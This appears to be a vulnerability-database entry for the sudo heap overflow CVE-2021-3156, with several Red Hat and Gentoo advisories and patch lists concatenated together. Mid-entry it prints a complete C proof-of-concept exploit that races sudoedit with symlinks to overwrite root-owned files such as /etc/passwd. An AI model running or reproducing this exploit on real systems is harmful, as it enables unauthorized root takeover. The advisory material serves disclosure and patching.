ID

VAR-202101-1926

CVE

CVE-2021-3156

TITLE

Sudo set_cmd() is vulnerable to heap-based buffer overflow

DESCRIPTION

Sudo before 1.9.5p2 contains an off-by-one error that can result in a heap-based buffer overflow, which allows privilege escalation to root via "sudoedit -s" and a command-line argument that ends with a single backslash character. A heap-based overflow has been discovered in the set_cmd() function in sudo, which may allow a local attacker to execute commands with elevated administrator privileges.CVE-2021-3156 AffectedCVE-2021-3156 Affected. Sensormatic Electronics Company ( Johnson Controls subsidiary) Illustra is a surveillance and security camera system. Illustra includes vulnerabilities related to boundary condition determination ( CWE-193 , CVE-2021-3156 ) exists.Installed in the product by a third party under certain conditions Linux Operating system administrator privileges can be obtained. Relevant releases/architectures: RHEL 8-based RHEV-H for RHEV 4 (build requirements) - noarch, x86_64 Red Hat Virtualization 4 Hypervisor for RHEL 8 - noarch, x86_64 Red Hat Virtualization 4 Management Agent for RHEL 7 Hosts - noarch 3. These packages include redhat-release-virtualization-host, ovirt-node, and rhev-hypervisor. RHVH features a Cockpit user interface for monitoring the host's resources and performing administrative tasks. Bug Fix(es): * Previously, the Red Hat Virtualization Host (RHV-H) repository (rhvh-4-for-rhel-8-x86_64-rpms) did not include the libsmbclient package, which is a dependency for the sssd-ad package. Consequently, the sssd-ad package failed to install. With this update, the libsmbclient is now in the RHV-H repository, and sssd-ad now installs on RHV-H. (BZ#1868967) 4. Bugs fixed (https://bugzilla.redhat.com/): 1850939 - Hosted engine deployment does not properly show iSCSI LUN errors 1868967 - sssd-ad installation fails on RHV-H 4.4 due to missing libsmbclient from samba package in rhvh-4-for-rhel-8-x86_64-rpms channel 1889686 - CVE-2020-25684 dnsmasq: loose address/port check in reply_query() makes forging replies easier for an off-path attacker 1889688 - CVE-2020-25685 dnsmasq: loose query name check in reply_query() makes forging replies easier for an off-path attacker 1890125 - CVE-2020-25686 dnsmasq: multiple queries forwarded for the same name makes forging replies easier for an off-path attacker 1902315 - Rebase RHV-H 4.4 to RHV 4.4.4 1902646 - ssh connection fails due to overly permissive openssh.config file permissions 1909644 - HE deploy failed with "Failed to download metadata for repo 'rhel-8-for-x86_64-baseos-beta-rpms': Cannot download repomd.xml 1917684 - CVE-2021-3156 sudo: Heap buffer overflow in argument parsing 1921553 - RHVH upgrade to the latest 4.4.4-1 build will fail due to FileNotFoundError 1923126 - Hosted Engine setup fails on storage selection - Retrieval of iSCSI targets failed. # Exploit Title: Local Privilege Escalation - LPE # Authors and Contributors: cts, help from r4j, debug by nu11secur1ty # Date: 30.01.2021 # Vendor: https://www.sudo.ws/ # Link: https://www.sudo.ws/download.html # CVE: CVE-2021-3156 [+] Credits: Ventsislav Varbanovski (@ nu11secur1ty) [+] Website: https://www.nu11secur1ty.com/ [+] Source: https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-3156/1.30.2021 [Exploit Program Code] // Exploit by @gf_256 aka cts // With help from r4j // Debug by @nu11secur1ty // Original advisory by Baron Samedit of Qualys // Tested on Ubuntu 18.04 and 20.04 & 20.04.01 // You will probably need to adjust RACE_SLEEP_TIME. #include <stdio.h> #include <stdint.h> #include <stdlib.h> #include <string.h> #include <stdlib.h> #include <assert.h> #include <unistd.h> #include <sys/wait.h> #include <sys/types.h> #include <sys/resource.h> #include <sys/stat.h> #include <unistd.h> #include <fcntl.h> #include <pwd.h> // !!! best value of this varies from system-to-system !!! // !!! you will probably need to tune this !!! #define RACE_SLEEP_TIME 10000 char *target_file; char *src_file; size_t query_target_size() { struct stat st; stat(target_file, &st); return st.st_size; } char* read_src_contents() { FILE* f = fopen(src_file, "rb"); if (!f) { puts("oh no baby what are you doing :("); abort(); } fseek(f, 0, SEEK_END); long fsize = ftell(f); fseek(f, 0, SEEK_SET); char *content = malloc(fsize + 1); fread(content, 1, fsize, f); fclose(f); return content; } char* get_my_username() { // getlogin can return incorrect result (for example, root under su)! struct passwd *pws = getpwuid(getuid()); return strdup(pws->pw_name); } int main(int my_argc, char **my_argv) { puts("CVE-2021-3156 PoC by @gf_256"); puts("original advisory by Baron Samedit"); if (my_argc != 3) { puts("./meme <target file> <src file>"); puts("Example: ./meme /etc/passwd my_fake_passwd_file"); return 1; } target_file = my_argv[1]; src_file = my_argv[2]; printf("we will overwrite %s with shit from %s\n", target_file, src_file); char* myusername = get_my_username(); printf("hi, my name is %s\n", myusername); size_t initial_size = query_target_size(); printf("%s is %zi big right now\n", target_file, initial_size); char* shit_to_write = read_src_contents(); char memedir[1000]; char my_symlink[1000]; char overflow[1000]; char* bigshit = calloc(1,0x10000); memset(bigshit, 'A', 0xffff); // need a big shit in the stack so the write doesn't fail with bad address char *argv[] = {"/usr/bin/sudoedit", "-A", "-s", "\\", overflow, NULL }; char *envp[] = { "\n\n\n\n\n", // put some fuckin newlines here to separate our real contents from the junk shit_to_write, "SUDO_ASKPASS=/bin/false", "LANG=C.UTF-8@aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa ", bigshit, NULL }; puts("ok podracing time bitches"); // Boom =) // for (int i = 0; i < 5000; i++) for (int i = 0; i < 3000; i++) { sprintf(memedir, "ayylmaobigchungussssssssssss00000000000000000000000000%08d", i); sprintf(overflow, "11111111111111111111111111111111111111111111111111111111%s", memedir); sprintf(my_symlink, "%s/%s", memedir, myusername); puts(memedir); if (access(memedir, F_OK) == 0) { printf("dude, %s already exists, do it from a clean working dir\n", memedir); return 1; } pid_t childpid = fork(); if (childpid) { // parent usleep(RACE_SLEEP_TIME); mkdir(memedir, 0700); symlink(target_file, my_symlink); waitpid(childpid, 0, 0); } else { // child setpriority(PRIO_PROCESS, 0, 20); // set nice to 20 for race reliability execve("/usr/bin/sudoedit", argv, envp); // noreturn puts("execve fails?!"); abort(); } if (query_target_size() != initial_size) { puts("target file has a BRUH MOMENT!!!! SUCCess???"); system("xdg-open 'https://www.youtube.com/watch?v=cj_8X1cyVFc'"); // ayy lmao return 0; } } puts("Failed?"); puts("if all the meme dirs are owned by root, the usleep needs to be decreased."); puts("if they're all owned by you, the usleep needs to be increased"); return 0; } [Vendor] Sudo [Vulnerability Type] Buffer Overflow Local Privilege Escalation [CVE Reference] Sudo before 1.9.5p2 has a Heap-based Buffer Overflow, allowing privilege escalation to root via "sudoedit -s" and a command-line argument that ends with a single backslash character. [Security Issue] Taking control of the Linux system Vulnerabilty version: before 1.9.5p2 [Video] https://www.youtube.com/watch?v=L-dEIYEQd1E [Conclusion and Fix] https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-3156 https://www.youtube.com/watch?v=zf8FXOFWZKs @nu11secur1ty https://www.nu11secur1ty.com/ . Summary: Red Hat Ansible Automation Platform Resource Operator 1.2 (technical preview) images that fix several security issues. Description: Red Hat Ansible Automation Platform Resource Operator container images with security fixes. Ansible Automation Platform manages Ansible Platform jobs and workflows that can interface with any infrastructure on a Red Hat OpenShift Container Platform cluster, or on a traditional infrastructure that is running off-cluster. Solution: Before applying this update, make sure all previously released errata relevant to your system have been applied. Bugs fixed (https://bugzilla.redhat.com/): 1914774 - CVE-2021-20178 ansible: user data leak in snmp_facts module 1915808 - CVE-2021-20180 ansible module: bitbucket_pipeline_variable exposes secured values 1916813 - CVE-2021-20191 ansible: multiple modules expose secured values 1925002 - CVE-2021-20228 ansible: basic.py no_log with fallback option 1939349 - CVE-2021-3447 ansible: multiple modules expose secured values 5. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 202101-33 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - https://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: High Title: sudo: Multiple vulnerabilities Date: January 26, 2021 Bugs: #764986, #767364 ID: 202101-33 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======= Multiple vulnerabilities have been found in sudo, the worst of which could result in privilege escalation. Affected packages ================ ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 app-admin/sudo < 1.9.5_p2 >= 1.9.5_p2 Description ========== Multiple vulnerabilities have been discovered in sudo. Please review the CVE identifiers referenced below for details. Impact ===== Local users are able to gain unauthorized privileges on the system or determine the existence of files. Workaround ========= There is no known workaround at this time. Resolution ========= All sudo users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=app-admin/sudo-1.9.5_p2" References ========= [ 1 ] CVE-2021-23239 https://nvd.nist.gov/vuln/detail/CVE-2021-23239 [ 2 ] CVE-2021-23240 https://nvd.nist.gov/vuln/detail/CVE-2021-23240 [ 3 ] CVE-2021-3156 https://nvd.nist.gov/vuln/detail/CVE-2021-3156 [ 4 ] Upstream advisory (CVE-2020-23240) https://www.sudo.ws/alerts/sudoedit_selinux.html [ 5 ] Upstream advisory (CVE-2021-3156) https://www.sudo.ws/alerts/unescape_overflow.html Availability =========== This GLSA and any updates to it are available for viewing at the Gentoo Security Website: https://security.gentoo.org/glsa/202101-33 Concerns? ======== Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License ====== Copyright 2021 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. https://creativecommons.org/licenses/by-sa/2.5 . 8.1) - aarch64, ppc64le, s390x, x86_64 3. This advisory contains the following OpenShift Virtualization 2.6.0 images: RHEL-8-CNV-2.6 =============kubevirt-cpu-node-labeller-container-v2.6.0-5 kubevirt-cpu-model-nfd-plugin-container-v2.6.0-5 node-maintenance-operator-container-v2.6.0-13 kubevirt-vmware-container-v2.6.0-5 virtio-win-container-v2.6.0-5 kubevirt-kvm-info-nfd-plugin-container-v2.6.0-5 bridge-marker-container-v2.6.0-9 kubevirt-template-validator-container-v2.6.0-9 kubevirt-v2v-conversion-container-v2.6.0-6 kubemacpool-container-v2.6.0-13 kubevirt-ssp-operator-container-v2.6.0-40 hyperconverged-cluster-webhook-container-v2.6.0-73 hyperconverged-cluster-operator-container-v2.6.0-73 ovs-cni-plugin-container-v2.6.0-10 cnv-containernetworking-plugins-container-v2.6.0-10 ovs-cni-marker-container-v2.6.0-10 cluster-network-addons-operator-container-v2.6.0-16 hostpath-provisioner-container-v2.6.0-11 hostpath-provisioner-operator-container-v2.6.0-14 vm-import-virtv2v-container-v2.6.0-21 kubernetes-nmstate-handler-container-v2.6.0-19 vm-import-controller-container-v2.6.0-21 vm-import-operator-container-v2.6.0-21 virt-api-container-v2.6.0-111 virt-controller-container-v2.6.0-111 virt-handler-container-v2.6.0-111 virt-operator-container-v2.6.0-111 virt-launcher-container-v2.6.0-111 cnv-must-gather-container-v2.6.0-54 virt-cdi-importer-container-v2.6.0-24 virt-cdi-cloner-container-v2.6.0-24 virt-cdi-controller-container-v2.6.0-24 virt-cdi-uploadserver-container-v2.6.0-24 virt-cdi-apiserver-container-v2.6.0-24 virt-cdi-uploadproxy-container-v2.6.0-24 virt-cdi-operator-container-v2.6.0-24 hco-bundle-registry-container-v2.6.0-582 Security Fix(es): * golang.org/x/crypto: Processing of crafted ssh-ed25519 public keys allows for panic (CVE-2020-9283) * golang: crypto/ssh: crafted authentication request can lead to nil pointer dereference (CVE-2020-29652) * gogo/protobuf: plugin/unmarshal/unmarshal.go lacks certain index validation (CVE-2021-3121) * golang.org/x/text: possibility to trigger an infinite loop in encoding/unicode could lead to crash (CVE-2020-14040) * golang: data race in certain net/http servers including ReverseProxy can lead to DoS (CVE-2020-15586) * golang: ReadUvarint and ReadVarint can read an unlimited number of bytes from invalid inputs (CVE-2020-16845) * jwt-go: access restriction bypass vulnerability (CVE-2020-26160) * golang-github-gorilla-websocket: integer overflow leads to denial of service (CVE-2020-27813) * golang: math/big: panic during recursive division of very large numbers (CVE-2020-28362) * containernetworking-cni: Arbitrary path injection via type field in CNI configuration (CVE-2021-20206) For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. Bugs fixed (https://bugzilla.redhat.com/): 1732329 - Virtual Machine is missing documentation of its properties in yaml editor 1783192 - Guest kernel panic when start RHEL6.10 guest with q35 machine type and virtio disk in cnv 1791753 - [RFE] [SSP] Template validator should check validations in template's parent template 1804533 - CVE-2020-9283 golang.org/x/crypto: Processing of crafted ssh-ed25519 public keys allows for panic 1848954 - KMP missing CA extensions in cabundle of mutatingwebhookconfiguration 1848956 - KMP requires downtime for CA stabilization during certificate rotation 1853652 - CVE-2020-14040 golang.org/x/text: possibility to trigger an infinite loop in encoding/unicode could lead to crash 1853911 - VM with dot in network name fails to start with unclear message 1854098 - NodeNetworkState on workers doesn't have "status" key due to nmstate-handler pod failure to run "nmstatectl show" 1856347 - SR-IOV : Missing network name for sriov during vm setup 1856953 - CVE-2020-15586 golang: data race in certain net/http servers including ReverseProxy can lead to DoS 1859235 - Common Templates - after upgrade there are 2 common templates per each os-workload-flavor combination 1860714 - No API information from `oc explain` 1860992 - CNV upgrade - users are not removed from privileged SecurityContextConstraints 1864577 - [v2v][RHV to CNV non migratable source VM fails to import to Ceph-rbd / File system due to overhead required for Filesystem 1866593 - CDI is not handling vm disk clone 1867099 - CVE-2020-16845 golang: ReadUvarint and ReadVarint can read an unlimited number of bytes from invalid inputs 1868817 - Container-native Virtualization 2.6.0 Images 1873771 - Improve the VMCreationFailed error message caused by VM low memory 1874812 - SR-IOV: Guest Agent expose link-local ipv6 address for sometime and then remove it 1878499 - DV import doesn't recover from scratch space PVC deletion 1879108 - Inconsistent naming of "oc virt" command in help text 1881874 - openshift-cnv namespace is getting stuck if the user tries to delete it while CNV is running 1883232 - Webscale: kubevirt/CNV datavolume importer pod inability to disable sidecar injection if namespace has sidecar injection enabled but VM Template does NOT 1883371 - CVE-2020-26160 jwt-go: access restriction bypass vulnerability 1885153 - [v2v][RHV to CNv VM import] Wrong Network mapping do not show a relevant error message 1885418 - [openshift-cnv] issues with memory overhead calculation when limits are used 1887398 - [openshift-cnv][CNV] nodes need to exist and be labeled first, *before* the NodeNetworkConfigurationPolicy is applied 1889295 - [v2v][VMware to CNV VM import API] diskMappings: volumeMode Block is not passed on to PVC request. 1891285 - Common templates and kubevirt-config cm - update machine-type 1891440 - [v2v][VMware to CNV VM import API]Source VM with no network interface fail with unclear error 1892227 - [SSP] cluster scoped resources are not being reconciled 1893278 - openshift-virtualization-os-images namespace not seen by user 1893646 - [HCO] Pod placement configuration - dry run is not performed for all the configuration stanza 1894428 - Message for VMI not migratable is not clear enough 1894824 - [v2v][VM import] Pick the smallest template for the imported VM, and not always Medium 1894897 - [v2v][VMIO] VMimport CR is not reported as failed when target VM is deleted during the import 1895414 - Virt-operator is accepting updates to the placement of its workload components even with running VMs 1897635 - CVE-2020-28362 golang: math/big: panic during recursive division of very large numbers 1898072 - Add Fedora33 to Fedora common templates 1898840 - [v2v] VM import VMWare to CNV Import 63 chars vm name should not fail 1899558 - CNV 2.6 - nmstate fails to set state 1901480 - VM disk io can't worked if namespace have label kubemacpool 1902046 - Not possible to edit CDIConfig (through CDI CR / CDIConfig) 1902111 - CVE-2020-27813 golang-github-gorilla-websocket: integer overflow leads to denial of service 1903014 - hco-webhook pod in CreateContainerError 1903585 - [v2v] Windows 2012 VM imported from RHV goes into Windows repair mode 1904797 - [VMIO][vmware] A migrated RHEL/Windows VM starts in emergency mode/safe mode when target storage is NFS and target namespace is NOT "default" 1906199 - [CNV-2.5] CNV Tries to Install on Windows Workers 1907151 - kubevirt version is not reported correctly via virtctl 1907352 - VM/VMI link changes to `kubevirt.io~v1~VirtualMachineInstance` on CNV 2.6 1907691 - [CNV] Configuring NodeNetworkConfigurationPolicy caused "Internal error occurred" for creating datavolume 1907988 - VM loses dynamic IP address of its default interface after migration 1908363 - Applying NodeNetworkConfigurationPolicy for different NIC than default disables br-ex bridge and nodes lose connectivity 1908421 - [v2v] [VM import RHV to CNV] Windows imported VM boot failed: INACCESSIBLE BOOT DEVICE error 1908883 - CVE-2020-29652 golang: crypto/ssh: crafted authentication request can lead to nil pointer dereference 1909458 - [V2V][VMware to CNV VM import via api using VMIO] VM import to Ceph RBD/BLOCK fails on "qemu-img: /data/disk.img" error 1910857 - Provide a mechanism to enable the HotplugVolumes feature gate via HCO 1911118 - Windows VMI LiveMigration / shutdown fails on 'XML error: non unique alias detected: ua-') 1911396 - Set networkInterfaceMultiqueue false in rhel 6 template for e1000e interface 1911662 - el6 guests don't work properly if virtio bus is specified on various devices 1912908 - Allow using "scsi" bus for disks in template validation 1913248 - Creating vlan interface on top of a bond device via NodeNetworkConfigurationPolicy fails 1913320 - Informative message needed with virtctl image-upload, that additional step is needed from the user 1913717 - Users should have read permitions for golden images data volumes 1913756 - Migrating to Ceph-RBD + Block fails when skipping zeroes 1914177 - CNV does not preallocate blank file data volumes 1914608 - Obsolete CPU models (kubevirt-cpu-plugin-configmap) are set on worker nodes 1914947 - HPP golden images - DV shoudld not be created with WaitForFirstConsumer 1917908 - [VMIO] vmimport pod fail to create when using ceph-rbd/block 1917963 - [CNV 2.6] Unable to install CNV disconnected - requires kvm-info-nfd-plugin which is not mirrored 1919391 - CVE-2021-20206 containernetworking-cni: Arbitrary path injection via type field in CNI configuration 1920576 - HCO can report ready=true when it failed to create a CR for a component operator 1920610 - e2e-aws-4.7-cnv consistently failing on Hyperconverged Cluster Operator 1921650 - CVE-2021-3121 gogo/protobuf: plugin/unmarshal/unmarshal.go lacks certain index validation 1923979 - kubernetes-nmstate: nmstate-handler pod crashes when configuring bridge device using ip tool 1927373 - NoExecute taint violates pdb; VMIs are not live migrated 1931376 - VMs disconnected from nmstate-defined bridge after CNV-2.5.4->CNV-2.6.0 upgrade 5. 6 ELS) - i386, s390x, x86_64 3. 7.2) - x86_64 3. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 ==================================================================== Red Hat Security Advisory Synopsis: Important: sudo security update Advisory ID: RHSA-2021:0223-01 Product: Red Hat Enterprise Linux Advisory URL: https://access.redhat.com/errata/RHSA-2021:0223 Issue date: 2021-01-26 CVE Names: CVE-2021-3156 ==================================================================== 1. Summary: An update for sudo is now available for Red Hat Enterprise Linux 7.6 Extended Update Support. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. 2. Relevant releases/architectures: Red Hat Enterprise Linux ComputeNode EUS (v. 7.6) - x86_64 Red Hat Enterprise Linux ComputeNode Optional EUS (v. 7.6) - x86_64 Red Hat Enterprise Linux Server EUS (v. 7.6) - ppc64, ppc64le, s390x, x86_64 Red Hat Enterprise Linux Server Optional EUS (v. 7.6) - ppc64, ppc64le, s390x, x86_64 Red Hat Enterprise Linux for ARM and IBM Power LE (POWER9) Server (v. 7) - aarch64, ppc64le, s390x Red Hat Enterprise Linux for ARM and IBM Power LE (POWER9) Server Optional (v. 7) - aarch64, ppc64le, s390x 3. Description: The sudo packages contain the sudo utility which allows system administrators to provide certain users with the permission to execute privileged commands, which are used for system management purposes, without having to log in as root. Security Fix(es): * sudo: Heap buffer overflow in argument parsing (CVE-2021-3156) For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. 4. Solution: For details on how to apply this update, which includes the changes described in this advisory, refer to: https://access.redhat.com/articles/11258 5. Bugs fixed (https://bugzilla.redhat.com/): 1917684 - CVE-2021-3156 sudo: Heap buffer overflow in argument parsing 6. Package List: Red Hat Enterprise Linux ComputeNode EUS (v. 7.6): Source: sudo-1.8.23-3.el7_6.2.src.rpm x86_64: sudo-1.8.23-3.el7_6.2.x86_64.rpm sudo-debuginfo-1.8.23-3.el7_6.2.x86_64.rpm Red Hat Enterprise Linux ComputeNode Optional EUS (v. 7.6): x86_64: sudo-debuginfo-1.8.23-3.el7_6.2.i686.rpm sudo-debuginfo-1.8.23-3.el7_6.2.x86_64.rpm sudo-devel-1.8.23-3.el7_6.2.i686.rpm sudo-devel-1.8.23-3.el7_6.2.x86_64.rpm Red Hat Enterprise Linux Server EUS (v. 7.6): Source: sudo-1.8.23-3.el7_6.2.src.rpm ppc64: sudo-1.8.23-3.el7_6.2.ppc64.rpm sudo-debuginfo-1.8.23-3.el7_6.2.ppc64.rpm ppc64le: sudo-1.8.23-3.el7_6.2.ppc64le.rpm sudo-debuginfo-1.8.23-3.el7_6.2.ppc64le.rpm s390x: sudo-1.8.23-3.el7_6.2.s390x.rpm sudo-debuginfo-1.8.23-3.el7_6.2.s390x.rpm x86_64: sudo-1.8.23-3.el7_6.2.x86_64.rpm sudo-debuginfo-1.8.23-3.el7_6.2.x86_64.rpm Red Hat Enterprise Linux for ARM and IBM Power LE (POWER9) Server (v. 7): Source: sudo-1.8.23-3.el7_6.2.src.rpm aarch64: sudo-1.8.23-3.el7_6.2.aarch64.rpm sudo-debuginfo-1.8.23-3.el7_6.2.aarch64.rpm ppc64le: sudo-1.8.23-3.el7_6.2.ppc64le.rpm sudo-debuginfo-1.8.23-3.el7_6.2.ppc64le.rpm s390x: sudo-1.8.23-3.el7_6.2.s390x.rpm sudo-debuginfo-1.8.23-3.el7_6.2.s390x.rpm Red Hat Enterprise Linux Server Optional EUS (v. 7.6): ppc64: sudo-debuginfo-1.8.23-3.el7_6.2.ppc.rpm sudo-debuginfo-1.8.23-3.el7_6.2.ppc64.rpm sudo-devel-1.8.23-3.el7_6.2.ppc.rpm sudo-devel-1.8.23-3.el7_6.2.ppc64.rpm ppc64le: sudo-debuginfo-1.8.23-3.el7_6.2.ppc64le.rpm sudo-devel-1.8.23-3.el7_6.2.ppc64le.rpm s390x: sudo-debuginfo-1.8.23-3.el7_6.2.s390.rpm sudo-debuginfo-1.8.23-3.el7_6.2.s390x.rpm sudo-devel-1.8.23-3.el7_6.2.s390.rpm sudo-devel-1.8.23-3.el7_6.2.s390x.rpm x86_64: sudo-debuginfo-1.8.23-3.el7_6.2.i686.rpm sudo-debuginfo-1.8.23-3.el7_6.2.x86_64.rpm sudo-devel-1.8.23-3.el7_6.2.i686.rpm sudo-devel-1.8.23-3.el7_6.2.x86_64.rpm Red Hat Enterprise Linux for ARM and IBM Power LE (POWER9) Server Optional (v. 7): aarch64: sudo-debuginfo-1.8.23-3.el7_6.2.aarch64.rpm sudo-devel-1.8.23-3.el7_6.2.aarch64.rpm ppc64le: sudo-debuginfo-1.8.23-3.el7_6.2.ppc64le.rpm sudo-devel-1.8.23-3.el7_6.2.ppc64le.rpm s390x: sudo-debuginfo-1.8.23-3.el7_6.2.s390.rpm sudo-debuginfo-1.8.23-3.el7_6.2.s390x.rpm sudo-devel-1.8.23-3.el7_6.2.s390.rpm sudo-devel-1.8.23-3.el7_6.2.s390x.rpm These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/ 7. References: https://access.redhat.com/security/cve/CVE-2021-3156 https://access.redhat.com/security/updates/classification/#important https://access.redhat.com/security/vulnerabilities/RHSB-2021-002 8. Contact: The Red Hat security contact is <secalert@redhat.com>. More contact details at https://access.redhat.com/security/team/contact/ Copyright 2021 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1 iQIVAwUBYBCATtzjgjWX9erEAQiDkQ/8CyCFW0G3itmCMGwXsP5atS6Tgqc4zwbC ofAgAgWoKKlwelFIMra1XlbcwSiqDKyxRvZVXiberbmvsecRShd7y29CMf75R2FO P7qGv5BY8BLX0zDwHHNTSCdX4EXoMi4OUUzmO4JEgys8Vc0QfLyEpQJbIPJaeE/C OI6niwwsSKeB06CjOpmHef/xoltdiCRkAJ84A3wBN8L603Lbl7Ou1PpomXFTmBpx 1ZI+vHe+rGXLMLYsJOyZSi87spHiXX7ZUwHwf3LOpQvIEP3tTU7QVykAsB2nIWIh VVqjPwOeK4wxM1xn2DtBAeBE1m3QG9xBirIQosAUqh8v7coWyy+kNZxxnFKS8v5F ZuQpsM2c0EbEcz7QL703in6m/1fG8oT6QI/K0PQvAQBlxt4XG0N1Shz1XfCa884z 0xF5C31bd8tDOuakZNPg7ePLXpaZtyn/CZ5kyWIaSkMV5J1vYZIHPyJpb83QecUr c9vjQgD49kz2FzwJkGPcWAeqjBVFrRbE7TJQ8IAzkM08x6XeKuLp8sXixzhXzboy 9TBb65s22fEiHlMCcqW62QJGELPDLSwVvjasnX0tzkSE5t6NYV6HDbHRYcHJEG2b BWwYRlTvgfK1sodYoCGs6IeJVD8nHIeflNgkn0WQIbOznJjmBjgXXGGdj0XPDDuD l3p+edOWn0U=GeG5 -----END PGP SIGNATURE----- -- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce

AFFECTED PRODUCTS

CVSS

PROBLEMTYPE DATA

THREAT TYPE

local

TYPE

buffer error

EXPLOIT AVAILABILITY

PATCH

EXTERNAL IDS

REFERENCES

CREDITS

This document was written by Timur Snoke.Statement Date:   February 15, 2021

SOURCES

LAST UPDATE DATE

2024-10-23T21:23:38.484000+00:00

SOURCES UPDATE DATE

SOURCES RELEASE DATE